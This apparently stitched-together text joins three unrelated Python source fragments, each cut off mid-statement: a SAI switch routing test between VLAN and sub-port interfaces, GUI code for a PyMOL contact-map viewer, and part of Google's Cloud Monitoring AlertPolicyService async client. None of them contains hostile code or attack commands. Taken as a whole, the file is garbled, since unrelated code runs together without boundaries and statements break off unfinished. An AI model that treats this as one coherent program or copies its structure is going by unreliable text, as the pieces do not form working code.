addr_family = SAI_IP_ADDR_FAMILY_IPV4 ip_addr1 = '10.10.10.1' ip_addr1_subnet = '10.10.10.0' ip_mask1 = '255.255.255.0' dmac1 = '00:0a:00:00:00:01' ip_addr2 = '11.11.11.1' ip_addr2_subnet = '11.11.11.0' ip_mask2 = '255.255.255.0' dmac2 = '00:0b:00:00:00:01' vlan1_oid = sai_thrift_create_vlan(self.client, vlan1_id) vlan2_oid = sai_thrift_create_vlan(self.client, vlan2_id) vlan_member1 = sai_thrift_create_vlan_member(self.client, vlan1_oid, port1, SAI_VLAN_TAGGING_MODE_TAGGED) attr_value = sai_thrift_attribute_value_t(u16=vlan1_id) attr = sai_thrift_attribute_t(id=SAI_PORT_ATTR_PORT_VLAN_ID, value=attr_value) self.client.sai_thrift_set_port_attribute(port1, attr) vr_id = sai_thrift_create_virtual_router(self.client, v4_enabled, v6_enabled) rif_id1 = sai_thrift_create_router_interface(self.client, vr_id, SAI_ROUTER_INTERFACE_TYPE_VLAN, 0, vlan1_oid, v4_enabled, v6_enabled, '') rif_id2 = sai_thrift_create_router_interface(self.client, vr_id, SAI_ROUTER_INTERFACE_TYPE_SUB_PORT, port2, vlan2_oid, v4_enabled, v6_enabled, '') sai_thrift_create_neighbor(self.client, addr_family, rif_id1, ip_addr1, dmac1) sai_thrift_create_route(self.client, vr_id, addr_family, ip_addr1_subnet, ip_mask1, rif_id1) sai_thrift_create_neighbor(self.client, addr_family, rif_id2, ip_addr2, dmac2) sai_thrift_create_route(self.client, vr_id, addr_family, ip_addr2_subnet, ip_mask2, rif_id2) try: print "Sending packet ({} -> {}) : VLAN {} rif -> Sub-port (port 2 : vlan {}) rif".format(ip_addr1, ip_addr2, vlan1_id, vlan2_id) pkt = simple_tcp_packet(eth_dst=router_mac, eth_src=dmac1, ip_dst=ip_addr2, ip_src=ip_addr1, ip_id=105, ip_ttl=64, dl_vlan_enable=True, vlan_vid=vlan1_id) exp_pkt = simple_tcp_packet(eth_dst=dmac2, eth_src=router_mac, ip_dst=ip_addr2, ip_src=ip_addr1, ip_id=105, ip_ttl=63, dl_vlan_enable=True, vlan_vid=vlan2_id) send_packet(self, 0, str(pkt)) verify_packets(self, exp_pkt, [1]) print "Success" print "Sending packet ({} -> {}) : Sub-port (port 2 : vlan {}) rif -> VLAN {} rif".format(ip_addr2, ip_addr1, vlan2_id, vlan1_id) pkt = simple_tcp_packet(eth_dst=router_mac, eth_src=dmac2, ip_dst=ip_addr1, ip_src=ip_addr2, ip_id=105, ip_ttl=64, dl_vlan_enable=True, vlan_vid=vlan2_id) exp_pkt = simple_tcp_packet(eth_dst=dmac1, eth_src=router_mac, ip_dst=ip_addr1, ip_src=ip_addr2, ip_id=105, ip_ttl=63, dl_vlan_enable=True, vlan_vid=vlan1_id) send_packet(self, 1, str(pkt)) verify_packets(self, exp_pkt, [0]) print "Success" finally: sai_thrift_remove_route(self.client, vr_id, addr_family, ip_addr1_subnet, ip_mask1, rif_id1) sai_thrift_remove_route(self.client, vr_id, addr_family, ip_addr2_subnet, ip_mask2, rif_id2) sai_thrift_remove_neighbor(self.client, addr_family, rif_id1, ip_addr1, dmac1) sai_thrift_remove_neighbor(self.client, addr_family, rif_id2, ip_addr2, dmac2) self.client.sai_thrift_remove_router_interface(rif_id1) self.client.sai_thrift_remove_router_interface(rif_id2) self.client.sai_thrift_remove_vlan_member(vlan_member1) self.client.sai_thrift_remove_vlan(vlan1_oid) self.client.sai_thrift_remove_vlan(vlan2_oid) self.client.sai_thrift_remove_virtual_router(vr_id) attr_value = sai_thrift_attribute_value_t(u16=1) attr
self.sl_mid.grid(column=0, row=3) self.slider_mid.set((self.slider_max.get() - self.slider_min.get()) / 2) else: norm = None self.sl_mid.grid_forget() cmapa = cm.get_cmap(self.colormap.get()) cmapa.set_bad(color="0.75") cmapa.set_over(color="black") cmapa.set_under(color="white") heatmap = self.aplot.pcolorfast(self.data, cmap=cmapa, vmin=self.slider_min.get(), vmax=self.slider_max.get()) self.cmapa = cmapa self.norm = norm self.recolor_by_trueness_var.set(False) self.recolor_by_any_trueness.set(False) self.recolor_by_trueness() for patch in self.SELECTED_REGIONS: ## TODO only draws on top self.draw_selected_patch(patch) self.canvas.draw() mpl.colorbar.ColorbarBase(self.cmap_ax, cmap=self.cmapa, norm=self.norm, orientation='vertical') self.cmap_canvas.draw() self.redraw_bonds() def getTopXValues(self): try: X = int(self.top_values_cnt.get()) except: tkMessageBox.showerror(message="There is something wrong with the entered value \n Error code: (PEBKAC)") return if X==-1: X=0 if type(self.data) == np.ma.MaskedArray: cutoff = np.ma.sort(np.triu(self.data), axis=None, fill_value=0.)[-X] else: cutoff = np.sort(np.triu(self.data), axis=None)[-X] percent = X * 100. / ((self.data.shape[0] * self.data.shape[1] - self.data.shape[1]) / 2) self.top_values_pc.set(int(percent + 1)) self.slider_min.set(cutoff) def getTopPCValues(self): try: PC = int(self.top_values_pc.get()) except: tkMessageBox.showerror(message="There is something wrong with the entered value \n Error code: (PEBKAC)") return if PC==-1: X=0 else: X = int(((self.data.shape[0] * self.data.shape[1] - self.data.shape[1]) / 2) * (PC / 100.)) self.top_values_cnt.set(int(X)) if type(self.data) == np.ma.MaskedArray: cutoff = np.ma.sort(np.triu(self.data), axis=None, fill_value=0.)[-X] else: cutoff = np.sort(np.triu(self.data), axis=None)[-X] self.slider_min.set(cutoff) def spin_comp_distance_change(self,*args): if not self.LAST_HIT_KEY.get(): return self.makeSSplot() def spin_comp_distance_click(self,*args): self.LAST_HIT_KEY.set(1) def spin_comp_distance_key(self,event): self.LAST_HIT_KEY.set(event.keysym in ["Return", "KP_Enter", "Extended-Return"]) if not self.LAST_HIT_KEY.get(): return self.makeSSplot() def spin_min_change_key(self,event): self.LAST_HIT_KEY.set(event.keysym in ["Return", "KP_Enter", "Extended-Return"]) if not self.LAST_HIT_KEY.get(): return self.spin_min_change() def spin_max_change_key(self,event): self.LAST_HIT_KEY.set(event.keysym in ["Return", "KP_Enter", "Extended-Return"]) if not self.LAST_HIT_KEY.get(): return self.spin_max_change() def mosjws_key(self,event): self.LAST_HIT_KEY.set(event.keysym in ["Return", "KP_Enter", "Extended-Return"]) if not self.LAST_HIT_KEY.get(): return if self.mark_on_similar_just_within.get() and any( [len(x) == 1 or x[0].split()[3] != x[1].split()[3] for x in self.DRAWN_BONDS]): self.redraw_bonds() self.makeSSplot() def mosjwc_change(self,*args): if not self.LAST_HIT_KEY.get(): return if self.mark_on_similar_just_within.get() and any( [len(x) == 1 or x[0].split()[3] != x[1].split()[3] for x in self.DRAWN_BONDS]): self.redraw_bonds() self.makeSSplot() def menu_atom_mode_change(self,*args): dm.Structure.mode = self.comp_atom_mode.get() self.clear_pymol_bonds() for structure in self.STRUCTURES: structure.makeContactMap(self.current_state_var.get(), mchain=False) if structure.chains_to_keep: structure.makeContactMap(self.current_state_var.get(), mchain=True) if dm.Structure.isRNA: if "anonical" in self.comp_atom_mode.get(): self.rna_nonwc_pairs_check.grid(column=0, row=2) self.dist_frame.grid_forget() else: self.rna_nonwc_pairs_check.grid_forget() self.dist_frame.grid(column=1, row=0) self.makeSSplot() def show_bonds_window(self, *args): if self.show_bond_selection.get(): self.window_of_selected_bonds.deiconify() else: self.window_of_selected_bonds.withdraw() def update_list_of_bonds(self): ###TODO z okazji interfaceu self.window_of_selected_bonds_text.config(state=Tk.NORMAL) self.window_of_selected_bonds_text.delete('1.0',Tk.END) def get_dist(a1,a2): if "c." in a1: try: return "%5.3f" % cmd.get_distance(a1,a2) except pymol.CmdException: return "Error" else: atom = "and name CA and elem C" if not dm.Structure.isRNA else "and name P and elem P" if self.interface_mode.get(): at1 = "{} and c. {} and i. {} {} and (alt A or alt '')".format(self.current_structure_obj_var.struct_1.objId, self.current_structure_obj_var.struct_1.chain_simple, a1.strip(self.current_structure_obj_var.struct_1.chain_simple), atom) at2 = "{} and c. {} and i. {} {} and (alt A or alt '')".format(self.current_structure_obj_var.struct_2.objId, self.current_structure_obj_var.struct_2.chain_simple, a2.strip( self.current_structure_obj_var.struct_2.chain_simple), atom) else: at1 = "{} and c. {} and i. {} {} and (alt A or alt '')".format(self.current_structure_obj_var.objId, a1[-1], a1[:-1], atom) at2 = "{} and c. {} and i. {} {} and (alt A or alt '')".format(self.current_structure_obj_var.objId, a2[-1], a2[:-1], atom) try: return "%5.3f" % cmd.get_distance(at1,at2) except pymol.CmdException: return "Error" def get_res(s): i = s.split("i. ")[1].split()[0] c = s.split("c. ")[1].split()[0] return (i + c.strip()) text = "Currently selected residue pairs:\n" for x in self.DRAWN_BONDS: if x[0][:5] == "dist_": text+="{}\t{}\t{}\n".format(x[1],x[2],get_dist(x[1],x[2])) else: y=map(get_res, x[:2]) text+="\t".join(y+[get_dist(*x[:2])])+"\n" self.window_of_selected_bonds_text.insert('1.0', text) self.window_of_selected_bonds_text.config(state="disabled") def binaryColormap(self): cmapa = colors.ListedColormap(['grey','red','blue']) bounds = [0.,self.slider_min.get(),self.slider_mid.get(),self.slider_max.get()] norm = colors.BoundaryNorm(bounds, cmapa.N) return cmapa,norm def binaryColormapColor(self,value): return (.5,.5,.5,1.) if value<self.slider_min.get() else (1.,0.,0.,1.) if value<=self.slider_mid.get() else (0.,0.,1.,1.) def comparison_mode_engaged(self,*args): self.clear_pymol_bonds() self.window_of_selected_bonds_text.config(state=Tk.NORMAL) self.window_of_selected_bonds_text.delete('1.0',Tk.END) self.window_of_selected_bonds_text.config(state="disabled") self.overlay_var.set(0) self.makeSSplot(from_native=1) def overlay(self): self.clear_pymol_bonds() if self.overlay_var.get(): self.spin_min_var_4cmap.set("just DI") self.spin_max_var_4cmap.set("just\nnative") self.comp_mode.set(0) else: self.spin_min_var_4cmap.set("%6f"%self.slider_min.get()) self.spin_max_var_4cmap.set("%6f"%self.slider_max.get()) self.makeSSplot(from_overlay=1) mpl.colorbar.ColorbarBase(self.cmap_ax, cmap=self.cmapa, norm=self.norm, orientation='vertical') self.cmap_canvas.draw() def recolor_by_any_trueness_do(self, *args): self.recolor_by_trueness(any=True) def recolor_by_trueness(self,any=False,*args): if any and self.recolor_by_any_trueness.get(): self.recolor_by_trueness_var.set(0) if not any and self.recolor_by_trueness_var.get(): self.recolor_by_any_trueness.set(0) if (self.recolor_by_trueness_var.get() or self.recolor_by_any_trueness.get()): self.SSMenu.entryconfig(11, state=Tk.NORMAL) self.SSMenu.entryconfig(9, state=Tk.NORMAL) self.SSMenu.entryconfig(10, state=Tk.NORMAL) self.spin_min_var_4cmap.set("FP") self.spin_max_var_4cmap.set("TP (intra)") else: self.SSMenu.entryconfig(11, state=Tk.DISABLED) self.SSMenu.entryconfig(9, state=Tk.DISABLED) self.SSMenu.entryconfig(10, state=Tk.DISABLED) self.spin_min_var_4cmap.set(str(self.spin_min_var.get())) self.spin_max_var_4cmap.set(str(self.spin_max_var.get())) if self.map_structure_mode.get() != self.OPCJE[0]: self.makeSSplot() mpl.colorbar.ColorbarBase(self.cmap_ax, cmap=self.cmapa, norm=self.norm, orientation='vertical') self.cmap_canvas.draw() self.canvas.draw() self.redraw_bonds() def mapSelectionBetweenPlots(self): # TODO I powinien wywalac jak full plot? from_single = "Single" in self.plot_to_remember to_single = 'Single' in self.map_structure_mode.get() mapping = None flip_axes = False #0,1-move x to y, 2-move y to x if self.SELECTED_REGIONS == []: return if from_single: from_struct = self.plot_to_remember.split("ture: ")[1] from_struct_obj = [x for x in self.STRUCTURES if x.objId in from_struct][0] if to_single: ##########3 SINGLE ---> SINGLE to_struct = self.map_structure_mode.get().split("ture: ")[1] to_struct_obj = [x for x in self.STRUCTURES if x.objId in to_struct][0] if from_struct_obj is to_struct_obj: #a overlay? if self.overlay_var.get() or self.restrict_to_structure_var.get(): mapping_X = lambda x: to_struct_obj.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) mapping_Y = mapping_X else: mapping_X = lambda x: to_struct_obj.translations.fasta2unal_fasta_f( from_struct_obj.translations.singleplot_restrict(x)) mapping_Y = mapping_X elif self.overlay_var.get() or self.restrict_to_structure_var.get(): mapping_X = lambda x: to_struct_obj.translations.fullplot2struct( from_struct_obj.translations.singleplot_restrict(x) ) mapping_Y = mapping_X else: mapping_X = lambda x: to_struct_obj.translations.fasta2unal_fasta_f(from_struct_obj.translations.singleplot(x)) mapping_Y = mapping_X else: ############# SINGLE -- >IFACE to_struct = self.map_structure_mode.get().split("Interface: ")[1] to_struct_obj = [x for x in self.DOUBLE_STRUCTURES if x.objId in to_struct][0] if (to_struct_obj.struct_1.objId == from_struct_obj.objId and to_struct_obj.struct_1.chain_simple == from_struct_obj.chain_simple): if self.overlay_var.get() or self.restrict_to_structure_var.get(): mapping_X = lambda x: x mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.translations.singleplot_restrict(x)) else: mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) elif (to_struct_obj.struct_2.objId == from_struct_obj.objId and to_struct_obj.struct_2.chain_simple == from_struct_obj.chain_simple): if self.overlay_var.get() or self.restrict_to_structure_var.get(): mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.translations.singleplot_restrict(x)) mapping_Y = lambda x: x else: mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) else: if self.overlay_var.get() or self.restrict_to_structure_var.get(): mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.translations.singleplot_restrict(x)) mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.translations.singleplot_restrict(x)) else: mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) else: from_struct = self.plot_to_remember.split("Interface: ")[1] from_struct_obj = [x for x in self.DOUBLE_STRUCTURES if x.objId in from_struct][0] if to_single: #### IFACE ---> SINGLE to_struct = self.map_structure_mode.get().split("ture: ")[1] to_struct_obj = [x for x in self.STRUCTURES if x.objId in to_struct][0] if (from_struct_obj.struct_1.objId == to_struct_obj.objId and from_struct_obj.struct_1.chain_simple == to_struct_obj.chain_simple): mapping_X = lambda x:x mapping_Y = lambda x: to_struct_obj.translations.fullplot2struct( from_struct_obj.struct_2.translations.singleplot_restrict(x)) elif (from_struct_obj.struct_2.objId == to_struct_obj.objId and from_struct_obj.struct_2.chain_simple == to_struct_obj.chain_simple): mapping_X = lambda x: to_struct_obj.translations.fullplot2struct( from_struct_obj.struct_1.translations.singleplot_restrict(x)) mapping_Y = lambda x: x else: #TODO odpuszczam sprawdzanie czy restrict - ustawiam ze byc musi mapping_X = lambda x: to_struct_obj.translations.fullplot2struct(from_struct_obj.struct_1.translations.singleplot_restrict(x)) mapping_Y = lambda x: to_struct_obj.translations.fullplot2struct(from_struct_obj.struct_2.translations.singleplot_restrict(x)) else: ### IFACE --> IFACE to_struct = self.map_structure_mode.get().split("Interface: ")[1] to_struct_obj = [x for x in self.DOUBLE_STRUCTURES if x.objId in to_struct][0] if (from_struct_obj.struct_1.objId == to_struct_obj.struct_1.objId and from_struct_obj.struct_1.chain_simple == to_struct_obj.struct_1.chain_simple): mapping_X = lambda x: x mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.struct_2.translations.singleplot_restrict(x)) elif (from_struct_obj.struct_1.objId == to_struct_obj.struct_2.objId and from_struct_obj.struct_1.chain_simple == to_struct_obj.struct_2.chain_simple): flip_axes = 1 mapping_Y = lambda x:x mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.struct_2.translations.singleplot_restrict(x)) elif (from_struct_obj.struct_2.objId == to_struct_obj.struct_1.objId and from_struct_obj.struct_2.chain_simple == to_struct_obj.struct_1.chain_simple): flip_axes = 2 mapping_X = lambda x:x mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.struct_1.translations.singleplot_restrict(x)) elif (from_struct_obj.struct_2.objId == to_struct_obj.struct_2.objId and from_struct_obj.struct_2.chain_simple == to_struct_obj.struct_2.chain_simple): mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.struct_1.translations.singleplot_restrict(x)) mapping_Y = lambda x:x else: mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.struct_1.translations.singleplot_restrict(x)) mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.struct_2.translations.singleplot_restrict(x)) new_regions = [] for region in self.SELECTED_REGIONS: X,Y,m = region if flip_axes: X,Y = Y,X X = map(int,X) Y = map(int,Y) X = filter(lambda y: y is not None, map(mapping_X,xrange(X[0],X[1]+1))) Y = filter(lambda y: y is not None, map(mapping_Y,xrange(Y[0],Y[1]+1))) X = [X[0],X[-1]] Y = [Y[0],Y[-1]] new_regions.append((X,Y,m)) self.SELECTED_REGIONS = new_regions def alert_setting_change(self,*args): self.SELECTED_MERS = [] if self.plot_to_remember is not None and self.map_structure_mode.get()!=self.OPCJE[0]: self.mapSelectionBetweenPlots() self.plot_to_remember = self.map_structure_mode.get() self.FIGURE.clf() self.clear_pymol_bonds() self.interface_mode.set(0) self.menubar.entryconfig("Interface plot", state=Tk.DISABLED) if "Single" in self.map_structure_mode.get(): self.current_structure_var = self.map_structure_mode.get().split("ture: ")[1] self.current_structure_obj_var = [x for x in self.STRUCTURES if x.objId in self.current_structure_var][0] self.fileMenu.entryconfig(5,state=Tk.NORMAL) self.fileMenu.entryconfig(6,state=Tk.NORMAL) self.fileMenu.entryconfig(3, state=Tk.NORMAL) self.fileMenu.entryconfig(4, state=Tk.NORMAL) self.comp_mode.set(False) self.menubar.entryconfig("Single structure plot", state=Tk.NORMAL) self.SSframe.grid(column=0,row=0) self.get_pymol_selection.grid(column=0, row=5, sticky="S") self.keep_shown_bonds.grid(column=0, row=6, sticky="S") self.clear_shown_bonds.grid(column=0, row=7, sticky="S") self.keep_selected_regions.grid(row=8,column=0, sticky="S") self.legend.grid(column=0, row=9, sticky="S") self.overlay_var.set(0) self.makeSSplot() elif "Interface:" == self.map_structure_mode.get().split()[0]: self.current_structure_var = self.map_structure_mode.get().split("Interface: ")[1] self.current_structure_obj_var = [x for x in self.DOUBLE_STRUCTURES if x.objId in self.current_structure_var][0] self.interface_mode.set(1) self.menubar.entryconfig("Single structure plot", state=Tk.DISABLED) self.menubar.entryconfig("Interface plot", state=Tk.NORMAL) self.SSframe.grid(column=0, row=0) self.get_pymol_selection.grid(column=0, row=5, sticky="S") self.keep_shown_bonds.grid(column=0, row=6, sticky="S") self.clear_shown_bonds.grid(column=0, row=7, sticky="S") self.keep_selected_regions.grid(column=0, row=8, sticky="S") self.legend.grid(column=0, row=9, sticky="S") if not self.current_structure_obj_var.maps.has_key(dm.Structure.flat_modes[dm.Structure.mode]): self.wait("Calculating native contacts map for {}".format(self.current_structure_obj_var.objId)) self.current_structure_obj_var.makeMultiStateContactFile(progress=self._wait_in_progress) self.current_structure_obj_var.makeContactMap(self.current_state_var) self.wait_window.withdraw() self.restrict_to_structure_var.set(1) self.makeDSplot() else: self.menubar.entryconfig("Single structure plot", state=Tk.DISABLED) self.SSframe.grid_remove() self.legend.grid_remove() self.get_pymol_selection.grid_remove() self.keep_shown_bonds.grid_remove() self.keep_selected_regions.grid_remove() self.clear_shown_bonds.grid_remove() plt.subplots_adjust(left=0.07, bottom=0.05, right=0.97, top=0.97, wspace=0.01, hspace=0.01) self.current_structure_var = None self.current_structure_obj_var = None self.fileMenu.entryconfig(5,state=Tk.DISABLED) self.fileMenu.entryconfig(6,state=Tk.DISABLED) self.fileMenu.entryconfig(3,state=Tk.DISABLED) self.fileMenu.entryconfig(4,state=Tk.DISABLED) self.aplot = self.FIGURE.add_subplot(111) self.data = np.array(self.DATA_BACKUP) if self.colormap.get() == "BinaryTP": cmapa, norm = self.binaryColormap() heatmap = self.aplot.pcolorfast(self.data, cmap=cmapa, norm=norm, vmin=self.slider_min.get(), vmax=self.slider_max.get()) else: norm = None cmapa = cm.get_cmap(self.colormap.get()) heatmap = self.aplot.pcolorfast(self.data, cmap=cmapa, vmin=self.slider_min.get(), vmax=self.slider_max.get()) self.cmapa = cmapa self.norm = norm self.recolor_by_trueness_var.set(False) self.recolor_by_any_trueness.set(False) self.overlay_var.set(0) self.aplot.invert_yaxis() self.aplot.set_xlabel("") self.aplot.set_ylabel("") self.canvas.draw() self.customToolbar.update() mpl.colorbar.ColorbarBase(self.cmap_ax, cmap=self.cmapa, norm=self.norm, orientation='vertical') self.cmap_canvas.draw() if self.plot_to_remember is
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from collections import OrderedDict import functools import re from typing import Dict, Sequence, Tuple, Type, Union import pkg_resources from google.api_core.client_options import ClientOptions from google.api_core import exceptions as core_exceptions from google.api_core import gapic_v1 from google.api_core import retry as retries from google.auth import credentials as ga_credentials # type: ignore from google.oauth2 import service_account # type: ignore try: OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault] except AttributeError: # pragma: NO COVER OptionalRetry = Union[retries.Retry, object] # type: ignore from google.cloud.monitoring_v3.services.alert_policy_service import pagers from google.cloud.monitoring_v3.types import alert from google.cloud.monitoring_v3.types import alert_service from google.cloud.monitoring_v3.types import mutation_record from google.protobuf import field_mask_pb2 # type: ignore from google.protobuf import wrappers_pb2 # type: ignore from google.rpc import status_pb2 # type: ignore from .transports.base import AlertPolicyServiceTransport, DEFAULT_CLIENT_INFO from .transports.grpc_asyncio import AlertPolicyServiceGrpcAsyncIOTransport from .client import AlertPolicyServiceClient class AlertPolicyServiceAsyncClient: """The AlertPolicyService API is used to manage (list, create, delete, edit) alert policies in Stackdriver Monitoring. An alerting policy is a description of the conditions under which some aspect of your system is considered to be "unhealthy" and the ways to notify people or services about this state. In addition to using this API, alert policies can also be managed through `Stackdriver Monitoring <https://cloud.google.com/monitoring/docs/>`__, which can be reached by clicking the "Monitoring" tab in `Cloud Console <https://console.cloud.google.com/>`__. """ _client: AlertPolicyServiceClient DEFAULT_ENDPOINT = AlertPolicyServiceClient.DEFAULT_ENDPOINT DEFAULT_MTLS_ENDPOINT = AlertPolicyServiceClient.DEFAULT_MTLS_ENDPOINT alert_policy_path = staticmethod(AlertPolicyServiceClient.alert_policy_path) parse_alert_policy_path = staticmethod( AlertPolicyServiceClient.parse_alert_policy_path ) alert_policy_condition_path = staticmethod( AlertPolicyServiceClient.alert_policy_condition_path ) parse_alert_policy_condition_path = staticmethod( AlertPolicyServiceClient.parse_alert_policy_condition_path ) common_billing_account_path = staticmethod( AlertPolicyServiceClient.common_billing_account_path ) parse_common_billing_account_path = staticmethod( AlertPolicyServiceClient.parse_common_billing_account_path ) common_folder_path = staticmethod(AlertPolicyServiceClient.common_folder_path) parse_common_folder_path = staticmethod( AlertPolicyServiceClient.parse_common_folder_path ) common_organization_path = staticmethod( AlertPolicyServiceClient.common_organization_path ) parse_common_organization_path = staticmethod( AlertPolicyServiceClient.parse_common_organization_path ) common_project_path = staticmethod(AlertPolicyServiceClient.common_project_path) parse_common_project_path = staticmethod( AlertPolicyServiceClient.parse_common_project_path ) common_location_path = staticmethod(AlertPolicyServiceClient.common_location_path) parse_common_location_path = staticmethod( AlertPolicyServiceClient.parse_common_location_path ) @classmethod def from_service_account_info(cls, info: dict, *args, **kwargs): """Creates an instance of this client using the provided credentials info. Args: info (dict): The service account private key info. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: AlertPolicyServiceAsyncClient: The constructed client. """ return AlertPolicyServiceClient.from_service_account_info.__func__(AlertPolicyServiceAsyncClient, info, *args, **kwargs) # type: ignore @classmethod def from_service_account_file(cls, filename: str, *args, **kwargs): """Creates an instance of this client using the provided credentials file. Args: filename (str): The path to the service account private key json file. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: AlertPolicyServiceAsyncClient: The constructed client. """ return AlertPolicyServiceClient.from_service_account_file.__func__(AlertPolicyServiceAsyncClient, filename, *args, **kwargs) # type: ignore from_service_account_json = from_service_account_file @property def transport(self) -> AlertPolicyServiceTransport: """Returns the transport used by the client instance. Returns: AlertPolicyServiceTransport: The transport used by the client instance. """ return self._client.transport get_transport_class = functools.partial( type(AlertPolicyServiceClient).get_transport_class, type(AlertPolicyServiceClient), ) def __init__( self, *, credentials: ga_credentials.Credentials = None, transport: Union[str, AlertPolicyServiceTransport] = "grpc_asyncio", client_options: ClientOptions = None, client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO, ) -> None: """Instantiates the alert policy service client. Args: credentials (Optional[google.auth.credentials.Credentials]): The authorization credentials to attach to requests. These credentials identify the application to the service; if none are specified, the client will attempt to ascertain the credentials from the environment. transport (Union[str, ~.AlertPolicyServiceTransport]): The transport to use. If set to None, a transport is chosen automatically. client_options (ClientOptions): Custom options for the client. It won't take effect if a ``transport`` instance is provided. (1) The ``api_endpoint`` property can be used to override the default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT environment variable can also be used to override the endpoint: "always" (always use the default mTLS endpoint), "never" (always use the default regular endpoint) and "auto" (auto switch to the default mTLS endpoint if client certificate is present, this is the default value). However, the ``api_endpoint`` property takes precedence if provided. (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable is "true", then the ``client_cert_source`` property can be used to provide client certificate for mutual TLS transport. If not provided, the default SSL client certificate will be used if present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not set, no client certificate will be used. Raises: google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport creation failed for any reason. """ self._client = AlertPolicyServiceClient( credentials=credentials, transport=transport, client_options=client_options, client_info=client_info, ) async def list_alert_policies( self, request: Union[alert_service.ListAlertPoliciesRequest, dict] = None, *, name: str = None, retry: OptionalRetry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> pagers.ListAlertPoliciesAsyncPager: r"""Lists the existing alerting policies for the workspace. Args: request (Union[google.cloud.monitoring_v3.types.ListAlertPoliciesRequest, dict]): The request object. The protocol for the `ListAlertPolicies` request. name (:class:`str`): Required. The `project <https://cloud.google.com/monitoring/api/v3#project_name>`__ whose alert policies are to be listed. The format is: :: projects/[PROJECT_ID_OR_NUMBER] Note that this field names the parent container in which the alerting policies to be listed are stored. To retrieve a single alerting policy by name, use the [GetAlertPolicy][google.monitoring.v3.AlertPolicyService.GetAlertPolicy] operation, instead. This corresponds to the ``name`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.cloud.monitoring_v3.services.alert_policy_service.pagers.ListAlertPoliciesAsyncPager: The protocol for the ListAlertPolicies response. Iterating over this object will yield results and resolve additional pages automatically. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([name]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." ) request = alert_service.ListAlertPoliciesRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if name is not None: request.name = name # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.list_alert_policies, default_retry=retries.Retry( initial=0.1, maximum=30.0, multiplier=1.3, predicate=retries.if_exception_type( core_exceptions.ServiceUnavailable, ), deadline=30.0, ), default_timeout=30.0, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)), ) # Send the request. response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # This method is paged; wrap the response in a pager, which provides # an `__aiter__` convenience method. response = pagers.ListAlertPoliciesAsyncPager( method=rpc, request=request, response=response, metadata=metadata, ) # Done; return the response. return response async def get_alert_policy( self, request: Union[alert_service.GetAlertPolicyRequest, dict] = None, *, name: str = None, retry: OptionalRetry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> alert.AlertPolicy: r"""Gets a single alerting policy. Args: request (Union[google.cloud.monitoring_v3.types.GetAlertPolicyRequest, dict]): The request object. The protocol for the `GetAlertPolicy` request. name (:class:`str`): Required. The alerting policy to retrieve. The format is: :: projects/[PROJECT_ID_OR_NUMBER]/alertPolicies/[ALERT_POLICY_ID] This corresponds to the ``name`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.cloud.monitoring_v3.types.AlertPolicy: A description of the conditions under which some aspect of your system is considered to be "unhealthy" and the ways to notify people or services about this state. For an overview of alert policies, see [Introduction to Alerting](\ https://cloud.google.com/monitoring/alerts/). """ # Create or 